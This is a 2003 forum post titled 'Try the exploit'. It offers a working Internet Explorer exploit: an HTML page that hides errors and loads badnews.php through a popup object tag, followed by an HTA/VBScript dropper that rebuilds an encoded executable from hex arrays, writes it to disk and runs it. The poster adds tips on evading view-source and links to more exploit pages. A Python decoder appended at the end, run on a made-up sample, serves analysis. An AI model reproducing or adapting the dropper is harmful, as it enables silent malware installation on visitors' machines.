Try the exploit
StratOS (Slovenia)
Try the exploit, 24.09.2003 at 19:59
IE flaws (security):

Re-evaluating HTML elevation dataSrc command execution
Description: Allows execution of arbitrary commands in Local Zones
Detail: This bug is related to the codebase local path bug, but details the actual issue and runs without scripting or ActiveX enabled
Published: February 28th 2002
Reference:
Example exploit:
Note: See 6th May 2003 Notes.

Notes September 2003:
Renamed and re-added, symptom fixed instead of problem. Now demonstrates how to reach HTA functionality.
Reference: http://msgs.securepoint.com/cgi-bin/get/bugtraq0309/83.html
Example exploit: http://www.malware.com/badnews.html
Example exploit without scripting: http://www.malware.com/greymagic.html
Temporary workaround: Change the mime-type application/hta to something else.

What happens?
Start the HTML!
Code:

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script>
  var oPopup = window.createPopup();

  function showPopup() {
    oPopup.document.body.innerHTML = "<object data=badnews.php>";
    oPopup.show(0,0,1,1,document.body);
  }
  
  showPopup()
</script>
<br>
<br>
<br>
<br>
<center><b> <br>
<br>
<br>
<br>
<br>
<font size="1" color="#f1f1f1" face="system,arial">clear m_a_l_w_a_r_e.exe from C:\</font></b></center>

No View Source in IE, huh:
object data=badnews.php

and that PHP, once the HTA (a VBS application) starts automatically:
Code:

<title>malware</title>
<script language=vbs>

self.MoveTo 5000,5000

dim v(24)
cut=""

'Do we want to supply some other exe?
'We don't

v(0)="4D,5A,44,01,05,y,02,y,20,y,21,y,z2,75,y2,02,y2,99,y3,3E,y3,01,y,FB,30,6A,72,y1C,79,y3,9E,y1CD,66,33,C0,33,z,8C,D3,83,C3,20,B9,70,3F,8E,C3,F3,66,AB,8C,C0,8E,D8,B8,y,A0,8E,C0,C3,66"
v(1)=",B9,y,FA,y2,66,BF,y4,66,BE,81,02,y2,66,33,C0,67,8A,9F,40,01,y2,03,D8,C1,E3,04,2B,D8,2B,D8,66,C1,C8,10,03,D8,AC,03,D8,C1,EB,05,67,88,1F,47,E2,DE,C3,B9,80,3E,33,z,33,F6,F3,66,A5,C3"
v(2)=",1E,06,8C,D8,05,A0,0F,8E,C0,B8,0F,y,8E,D8,33,C0,67,8A,03,8B,F0,BF,0A,y,B9,2C,01,F3,A4,8B,F0,83,C7,14,B9,2C,01,F3,A4,07,1F,C3,B0,13,CD,10,BA,0F,y,8E,DA,BE,48,03,BA,C8,03,32,C0,EE"
v(3)=",42,B9,y,03,F3,6E,E8,5C,z,66,33,DB,E8,B5,z,53,E8,6E,z,BA,DA,03,EC,A8,08,75,FB,EC,A8,08,74,FB,E8,96,z,5B,FE,C3,B4,01,CD,16,74,E0,B8,03,y,CD,10,B8,y,4C,CD,21,yF,B1,C0,90,1D,7B"
v(4)=",88,D9,26,6B,C2,C1,88,B8,C9,A4,3A,8B,7F,93,8E,5C,30,DB,1F,3A,7F,8D,57,33,C1,8C,B1,77,98,89,DA,6B,D7,5C,86,7C,AB,A8,8E,22,D0,D9,A0,5E,85,D9,2E,A2,C3,6C,63,6C,45,24,BF,21,97,8E,D0,8A"
v(5)=",1A,BF,C0,9B,16,26,B2,9D,D7,8A,2D,B3,8C,24,49,A5,8D,29,9F,2D,87,5C,C6,C7,5A,38,97,96,2D,2A,15,CD,A5,73,CC,AE,A6,5D,75,A4,22,B3,9F,8C,D7,77,26,A7,56,B0,B8,64,84,1B,5A,D9,1D,CE,AF,36"
v(6)=",3B,98,7C,C3,38,4C,C0,1A,22,1E,CF,46,79,622,1D,78,D7,CF,6D,DA,7F,6C,A2,25,97,C8,4B,C2,C8,33,70,A5,29,1C,19,BB,A9,69,18,A3,34,9F,51,63,33,1B,3A,7D,57,81,BD,20,A9,D5,23,19,55,4C,55,AA"
v(7)=",62,19,A1,89,23,2B,6B,30,72,92,39,52,94,A8,35,6E,57,CA,CC,C8,CB,9B,C1,71,46,6B,61,6B,2A,7E,71,C7,49,AD,3A,4F,AB,C1,5F,15,67,A7,C4,3C,87,90,59,8A,D7,64,C8,21,BE,1B,6C,90,B0,D8,73,91"
v(8)=",50,75,41,3C,4C,56,D6,3F,A2,2C,1C,B9,65,D8,76,C6,38,B5,51,B9,33,B4,48,64,84,56,A8,A0,AE,1D,9C,C2,1B,83,93,DB,59,54,22,75,70,AF,9E,19,7E,78,34,7D,5D,AA,A1,5E,55,46,BB,BE,14,C5,1A,45"
v(9)=",5E,14,3B,C5,7B,6D,BB,40,81,AD,7A,D2,4A,8E,3D,B4,D6,5C,A9,C6,26,C7,98,58,C6,7D,BB,15,BE,78,CF,C5,74,7C,75,AA,2B,77,25,C1,5F,A7,23,C1,8A,CF,D7,49,55,54,9B,84,8A,55,5D,35,1F,71,25,92"
v(10)=",79,D5,CF,82,2E,23,5D,8B,35,8A,4E,76,1C,C6,7E,26,19,AF,A7,32,38,CE,49,2C2,D0,14,67,39,2D,29,83,33,82,CE,AD,CF,CD,28,1A,1E,38,B0,CE,41,2E,7B,48,4C,2B,D2,92,BD,CB,97,24,B8,39,C2,9C,5A"
v(11)=",D9,D3,63,17,D7,71,18,302,96,67,1C,9E,50,45,58,30,8B,C4,7F,85,9A,4C,C9,58,B3,1F,D3,53,20,24,C9,D6,D0,A8,5A,A1,48,92,7B,D3,70,B2,72,2A,CF,B5,8F,C1,63,2D,1F,6E,1C,B6,B2,C0,2E,B6,26,19"
v(12)=",B5,20,B9,5C,14,3D,C9,2A,51,20,7A,3B,B3,2B,CE,B8,3F,90,A8,2F,CF,4E,CF,68,28,1B,14,BF,6F,A2,1C,85,88,D0,AA,5E,18,B7,1A,1E,C6,7F,D9,94,6D,AC,B5,4C,59,B0,6E,C0,4D,3D,A4,C0,5A,90,65,38"
v(13)=",53,38,61,81,CA,A4,3C,96,28,49,78,86,54,2F,63,2E,42,66,57,28,2B,95,BF,58,5E,51,95,5E,A2,3D,71,C9,A8,CD,AE,C1,54,D4,BC,2A,9C,76,9E,43,9E,84,92,AB,A4,3B,1B,BF,B9,75,65,5E,B3,3C,8C,94"
v(14)=",41,B5,93,B8,59,DB,C2,87,D5,76,60,61,3B,47,A9,15,7E,96,A2,38,60,62,80,9B,2A,5E,CB,A7,6F,47,83,36,82,8F,72,18,37,8F,20,4E,D8,9E,B1,9B,85,3E,A3,70,5F,8A,54,5B,2D,C6,A8,A7,68,8D,94,1E"
v(15)=",44,A4,16,83,BC,99,58,3E,C5,9E,15,4F,9C,78,3A,6A,7F,2A,32,9F,48,30,47,59,6D,3D,AA,48,7D,AE,AF,DB,72,A8,D9,D1,2A,98,B5,49,BC,36,6B,17,45,D2,3E,DB,37,B1,67,80,A0,99,9D,93,89,93,90,88"
v(16)=",90,47,58,65,5A,C4,C8,80,2E,80,A0,8F,77,9A,5E,4F,D3,B3,92,3A,81,1B,4D,CD,2B,D8,A1,5B,9F,63,3E,D6,A7,17,55,7C,73,C9,90,C5,33,85,82,B2,39,78,64,C1,3C,C2,77,80,4D,21,37,96,29,69,4A,C6"
v(17)=",4A,53,C2,65,94,68,54,8C,A7,68,74,40,79,C7,512,63,8E,8D2,92,5B,37,30,722,47,A2,8E,B1,84,51,1D,A2,4B,26,53,58,7C,5C,B1,3A,97,AC,56,B7,C4,42,BC,3F,65,82,yF0,0F,y2,10,y2,11,y2,12,y2,13,y2"
v(18)=",14,y2,15,y2,16,y2,17,y2,18,y2,19,y2,1A,y2,1B,y2,1C,y2,1D,y2,1E,y2,1F,y2,20,y2,21,y2,22,y2,23,y2,24,y2,25,y2,26,y2,27,y2,28,y2,29,y2,2A,y2,2B,y2,2C,y2,2D,y2,2E,y2,2F,y2,30,y2,31,y2"
v(19)=",32,y2,33,y2,34,y2,35,y2,36,y2,37,y2,38,y2,39,y2,3A,y2,3B,y2,3C,y2,3D,y2,3E,y2,3F,y2,3F,y2,3F,y2,3F,01,y,3F,02,y,3F,03,y,3F,04,y,3F,05,y,3F,06,y,3F,07,y,3F,08,y,3F,09,y,3F"
v(20)=",0A,y,3F,0B,y,3F,0C,y,3F,0D,y,3F,0E,y,3F,0F,y,3F,10,y,3F,11,y,3F,12,y,3F,13,y,3F,14,y,3F,15,y,3F,16,y,3F,17,y,3F,18,y,3F,19,y,3F,1A,y,3F,1B,y,3F,1C,y,3F,1D,y,3F"
v(21)=",1E,y,3F,1F,y,3F,20,y,3F,21,y,3F,22,y,3F,23,y,3F,24,y,3F,25,y,3F,26,y,3F,27,y,3F,28,y,3F,29,y,3F,2A,y,3F,2B,y,3F,2C,y,3F,2D,y,3F,2E,y,3F,2F,y,3F,30,y,3F,31,y,3F"
v(22)=",32,y,3F,33,y,3F,34,y,3F,35,y,3F,36,y,3F,37,y,3F,38,y,3F,39,y,3F,3A,y,3F,3B,y,3F,3C,y,3F,3D,y,3F,3E,y,3F2,y,3F2,y,3F2,y,3F2,01,3F2,02,3F2,03,3F2,04,3F2,05,3F2,06,3F2,07,3F2,08"
v(23)=",3F2,09,3F2,0A,3F2,0B,3F2,0C,3F2,0D,3F2,0E,3F2,0F,3F2,10,3F2,11,3F2,12,3F2,13,3F2,14,3F2,15,3F2,16,3F2,17,3F2,18,3F2,19,3F2,1A,3F2,1B,3F2,1C,3F2,1D,3F2,1E,3F2,1F,3F2,20,3F2,21,3F2,22,3F2,23,3F2,24,3F2,25,3F2,26"
v(24)=",3F2,27,3F2,28,3F2,29,3F2,2A,3F2,2B,3F2,2C,3F2,2D,3F2,2E,3F2,2F,3F2,30,3F2,31,3F2,32,3F2,33,3F2,34,3F2,35,3F2,36,3F2,37,3F2,38,3F2,39,3F2,3A,3F2,3B,3F2,3C,3F2,3D,3F2,3E,3F5,3F"

function res(x,y)
    For k = 0 To UBound(v)
        v(k) = Replace(v(k), x, y)
    Next
End Function

res "z", "FF"
res "y", "00"
piece = Split(cut, "/")
cc = 103

For n = 0 To UBound(piece) - 1
    res Chr(cc), piece(n)
    cc = cc + 1
Next

For m = 0 To UBound(v)
    it = it & v(m)
Next


tmp = Split(it, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = "m_a_l_w_a_r_e.exe"
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
    l = Len(tmp(i))
    b = Int("&H" & Left(tmp(i), 2))
    If l > 2 Then
        r = Int("&H" & Mid(tmp(i), 3, l))
        For j = 1 To r
        f.Write Chr(b)
        Next
    Else
        f.Write Chr(b)
    End If
Next
f.Close
Set shell=CreateObject("WScript.Shell")
shell.run(pth)


</script>


FileSystemObject in VBS creates a new text file there (CreateTextFile);
if we have no AV, the *.exe starts automatically.
The only thing left to solve is the file-exists check, and the (break) problem in the script is solved.



-------------------------------------
No. 2. Something about what is going on ...
http://computerbytesman.com/security/notepadpopups.htm
-------------------------------------
No. 3.
>http://www.malware.com/once.again!.html<
NOTE: the URL is between >< because [ url ] tags don't help.
IFRAME, the well-known one; we can change it as well ... how ...
-------------------------------------
No. 4.
Do you have an updated/patched browser?
http://home.austin.rr.com/wiredgoddess/thepull/funRun.html
--------------------------------------
No. 5.
FileChecker
http://jscript.dk/Jumper/xploit/scriptsrc.html
--------------------------------------
Regards, StratOS
"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"As a rule, software systems do not work well until they have been used, and have failed repeatedly, in real applications."
"The one who is digging the hole for the other to fall in is already in it."
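For analysis of a dropper of the shape shown in the post (a VBS array of comma-separated hex tokens, an optional hex repeat count after each byte, and "z"/"y" placeholders that the `res` calls expand to FF/00), here is an added Python decoder that is not part of the original post. It rebuilds the bytes such a script would write to disk so an analyst can inspect the embedded file statically; the `SAMPLE_VBS` input is constructed for the example and is not the payload from the post.

```python
import re

# Constructed sample in the dropper's token format (NOT the page's payload):
# each token is a hex byte, optionally followed by a hex repeat count;
# 'z' and 'y' are placeholders that the res calls turn into FF and 00.
SAMPLE_VBS = '''
dim v(2)
v(0)="4D,5A,90,y2,z3,41"
v(1)=",422,E8,y10"
v(2)=",C3"
res "z", "FF"
res "y", "00"
'''

ARRAY_RE = re.compile(r'v\(\d+\)\s*=\s*"([^"]*)"')
SUBST_RE = re.compile(r'res\s+"(\w)"\s*,\s*"([0-9A-Fa-f]{2})"')


def decode_runs(script_text: str) -> bytes:
    """Rebuild the bytes the script would write via FileSystemObject."""
    # The VBS concatenates the v() strings as-is, then splits on commas.
    joined = "".join(m.group(1) for m in ARRAY_RE.finditer(script_text))
    # Apply the placeholder substitutions in the order the script does.
    for letter, hexval in SUBST_RE.findall(script_text):
        joined = joined.replace(letter, hexval)
    out = bytearray()
    for tok in joined.split(","):
        if not tok:
            continue
        byte = int(tok[:2], 16)
        # Anything after the first two hex digits is a hex repeat count.
        count = int(tok[2:], 16) if len(tok) > 2 else 1
        out.extend([byte] * count)
    return bytes(out)


def summarize(blob: bytes) -> dict:
    """Quick triage facts an analyst wants before looking deeper."""
    return {"size": len(blob), "starts_with_MZ": blob[:2] == b"MZ"}


if __name__ == "__main__":
    payload = decode_runs(SAMPLE_VBS)
    print(summarize(payload), payload.hex())
```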